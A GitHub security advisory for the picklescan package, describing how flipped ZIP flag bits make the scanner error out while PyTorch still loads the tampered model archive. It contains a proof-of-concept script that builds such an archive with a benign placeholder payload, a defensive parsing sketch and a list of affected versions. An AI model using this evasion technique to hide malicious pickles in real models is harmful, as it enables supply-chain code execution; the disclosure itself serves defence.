GHSA-w8jq-xcqf-f792

Source
https://github.com/advisories/GHSA-w8jq-xcqf-f792
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-w8jq-xcqf-f792/GHSA-w8jq-xcqf-f792.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-w8jq-xcqf-f792
Aliases
Published
2025-03-10T18:26:35Z
Modified
2025-03-10T18:42:06.738351Z
Severity
  • 5.3 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
Summary
Zip Flag Bit Exploit Crashes Picklescan But Not PyTorch
Details

Summary

PickleScan fails to detect malicious pickle files inside PyTorch model archives when certain ZIP file flag bits are modified. By flipping specific bits in the ZIP file headers, an attacker can embed malicious pickle files that remain undetected by PickleScan while still being successfully loaded by PyTorch's torch.load(). This can lead to arbitrary code execution when loading a compromised model.

Details

PickleScan relies on Python’s zipfile module to extract and scan files within ZIP-based model archives. However, certain flag bits in ZIP headers affect how files are interpreted, and some of these bits cause PickleScan to fail while leaving PyTorch’s loading mechanism unaffected.

By modifying the flag_bits field in the ZIP file entry, an attacker can:

  • Embed a malicious pickle file (bad_file.pkl) in a PyTorch model archive.
  • Flip specific bits (e.g., 0x1, 0x20, 0x40) in the ZIP metadata.
  • Prevent PickleScan from scanning the archive due to errors raised by zipfile.
  • Successfully load the model with torch.load(), which ignores the flag modifications.

This technique effectively bypasses PickleScan's security checks while maintaining model functionality.
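The failure happens on the zipfile side rather than in the pickle payload itself. As a minimal sketch (separate from the PoC below, relying on CPython's standard handling of these flag bits), the following shows how a tampered flag bit makes zipfile refuse an otherwise ordinary entry:

import io
import zipfile

# Build a perfectly ordinary in-memory archive.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("model/data.pkl", b"plain bytes")

# Re-open it and pretend the entry's flag bits were tampered with,
# the way the PoC below tampers with the on-disk headers.
with zipfile.ZipFile(buf) as zf:
    info = zf.infolist()[0]
    for bit in (0x1, 0x20, 0x40):
        info.flag_bits = bit
        try:
            zf.read(info)
        except (RuntimeError, NotImplementedError) as exc:
            # 0x1  -> RuntimeError: the entry claims to be encrypted
            # 0x20 -> NotImplementedError: compressed patched data
            # 0x40 -> NotImplementedError: strong encryption
            print(hex(bit), type(exc).__name__, exc)

Any of these exceptions aborts a zipfile-based scan, while torch.load() reads the archive with PyTorch's own native ZIP reader and is therefore unaffected by the same bits.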

PoC

import os
import zipfile
import torch
from picklescan import cli

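# Returns True if picklescan completes a scan of the archive, False if it errors out.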
def can_scan(zip_file):
    try:
        cli.print_summary(False, cli.scan_file_path(zip_file))
        return True
    except Exception:
        return False

bit_to_flip = 0x1  # Change to 0x20 or 0x40 to test different flag bits

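# Save a small benign model so there is a legitimate PyTorch archive to tamper with.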
zip_file = "model.pth"
model = {'a': 1, 'b': 2, 'c': 3}
torch.save(model, zip_file)

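# Copy the saved archive into a new ZIP, first injecting an extra pickle
# entry whose general-purpose flag bits have been flipped.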
with zipfile.ZipFile(zip_file, "r") as source:
    flipped_name = f"flipped_{bit_to_flip}_{zip_file}"
    with zipfile.ZipFile(flipped_name, "w") as dest:
        bad_file = zipfile.ZipInfo("model/bad_file.pkl")

        # Modify the ZIP flag bits
        bad_file.flag_bits |= bit_to_flip

        dest.writestr(bad_file, b"bad content")
        for item in source.infolist():
            dest.writestr(item, source.read(item.filename))

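# The bit is exploitable when PyTorch still loads the tampered archive
# but picklescan errors out instead of scanning it.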
if model == torch.load(flipped_name, weights_only=False):
    if not can_scan(flipped_name):
        print('Found exploitable bit:', bit_to_flip)
else:
    os.remove(flipped_name)

Impact

Severity: High

  • Who is impacted? Any organization or user relying on PickleScan to detect malicious pickle files inside PyTorch models.
  • What is the impact? Attackers can embed malicious pickle payloads inside PyTorch models that evade PickleScan's detection but still execute upon loading.
  • Potential Exploits: This vulnerability could be exploited in machine learning supply chain attacks, allowing attackers to distribute backdoored models on platforms like Hugging Face or PyTorch Hub.

Recommendations

  • Improve ZIP Handling: PickleScan should use a more relaxed ZIP parser that carries on when it encounters modified flag bits (a possible approach is sketched after this list).
  • Scan All Embedded Files Regardless of Flags: Ensure that files with altered metadata are still extracted and analyzed.

By addressing these issues, PickleScan can provide stronger protection against manipulated PyTorch model archives.
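
As an illustration of the first recommendation (a sketch only, using a hypothetical helper rather than picklescan's actual fix), the extraction-only flag bits can be cleared on each in-memory ZipInfo so a tampered header cannot abort the scan:

import zipfile

# Flag bits that only affect how zipfile extracts an entry:
# 0x1 encryption, 0x20 compressed patched data, 0x40 strong encryption.
TAMPERABLE_FLAG_BITS = 0x1 | 0x20 | 0x40

def iter_archive_entries(path):
    """Hypothetical helper (not picklescan's API): yield (name, raw bytes)
    for every entry, even ones with tampered flag bits."""
    with zipfile.ZipFile(path) as zf:
        for info in zf.infolist():
            # Clear the bits in memory; the stored bytes are read as-is.
            info.flag_bits &= ~TAMPERABLE_FLAG_BITS
            yield info.filename, zf.read(info)

If an entry really is encrypted, reading it this way typically fails the CRC check instead; a scanner can report that as suspicious rather than skipping the whole archive.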

Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-345"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-10T18:26:35Z"
}
References

Affected packages

PyPI / picklescan

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version / all previous versions are affected)
Fixed
0.0.23

Affected versions

0.*

0.0.1
0.0.2
0.0.3
0.0.4
0.0.5
0.0.6
0.0.7
0.0.8
0.0.9
0.0.10
0.0.11
0.0.12
0.0.13
0.0.14
0.0.15
0.0.16
0.0.17
0.0.18
0.0.19
0.0.20
0.0.21
0.0.22